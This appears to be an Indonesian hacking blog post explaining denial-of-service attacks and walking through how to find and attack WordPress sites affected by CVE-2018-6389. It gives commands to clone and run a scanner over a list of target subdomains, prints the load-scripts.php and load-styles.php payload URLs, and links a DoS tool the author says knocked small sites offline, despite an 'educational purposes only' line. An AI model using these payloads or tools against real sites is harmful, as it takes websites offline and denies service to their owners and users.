Mencari bug CVE-2018-6389 dengan scanner


Serangan DoS (denial of service attacks) adalah jenis serangan terhadap sebuah komputer atau server di dalam jaringan internet dengan cara menghabiskan sumber (resource) yang dimiliki oleh komputer tersebut sampai komputer tersebut tidak dapat menjalankan fungsinya dengan benar sehingga secara tidak langsung mencegah pengguna lain untuk memperoleh akses layanan dari komputer yang diserang tersebut.

Dalam sebuah serangan Denial of Service, si penyerang akan mencoba untuk mencegah akses seorang pengguna terhadap sistem atau jaringan dengan menggunakan beberapa cara, yakni sebagai berikut:


  • Membanjiri lalu lintas jaringan dengan banyak data sehingga lalu lintas jaringan yang datang dari pengguna yang terdaftar menjadi tidak dapat masuk ke dalam sistem jaringan. Teknik ini disebut sebagai traffic flooding.
  • Membanjiri jaringan dengan banyak request terhadap sebuah layanan jaringan yang disedakan oleh sebuah host sehingga request yang datang dari pengguna terdaftar tidak dapat dilayani oleh layanan tersebut. Teknik ini disebut sebagai request flooding.
  • Mengganggu komunikasi antara sebuah host dan kliennya yang terdaftar dengan menggunakan banyak cara, termasuk dengan mengubah informasi konfigurasi sistem atau bahkan perusakan fisik terhadap komponen dan server.

CVE-2018-6389 adalah salah satu bug Wordpress DOS Attack dimana penyerangan memanfaatkan fitur load-script dan load-style.php untuk lebih jelasnya silahkan pergi kesini karna artikel ini hanya membahas cara menggunakan scanner untuk menemukan celah CVE-2018-6389.





for educational purposes only
Oke seperti sebelumnya pada kasus Email spoofing kita harus mengumpulkan subdomain website target.

Setelah itu apa? save as list.txt

Sekarang tinggal recon menggunakan tools

git clone  https://github.com/Adelittle/Adscan

cd Adscan

bash little.sh
 Oh lupa, list.txt (list subdomain) taruh di folder Adscan biar gampang.




Penampakan Vuln



Penjelasan Tools

Tools ini mencari kata kunci (keyword) yang ada pada path yang kita masukkan tadi. jika kita memasukkan path /admin/ dan keyword password maka domain yang ada dalam list.txt akan ditambahkan path admin (ex: target.com/admin/) dan jika menemukan kata kunci password pada source code maka domain akan dianggap vuln.

Payload

/wp-admin/load-scripts.php?c=1&load=editor,common,user-profile,media-widgets,media-gallery/
/wp-admin/load-styles.php?&load=common,forms,admin-menu,dashboard,list-tables,edit/

Attacking

 Kalian Bisa menggunakan tools ran mitake, tools ini sudah saya coba untuk attacking situs skala kecil dan berhasil down (tanpa vps/rdp) tapi untuk situs besar membutuhkan vps atau rdp itupun jika tools dihentikan website dapat normal kembali sekitar 2-3 menit

https://github.com/Adelittle/Wordpressz_Dos_CVE_2018_6389

Preview tools:




Mungkin itu saja untuk artikel kali ini, jika ada yang kurang dipahami atau ingin bertanya silahkan menghubungi kami via fanspage.


Terimakasih dan semoga bermanfaat :)
Dah gitu aja~

Catatan: Hanya anggota dari blog ini yang dapat mengirim komentar.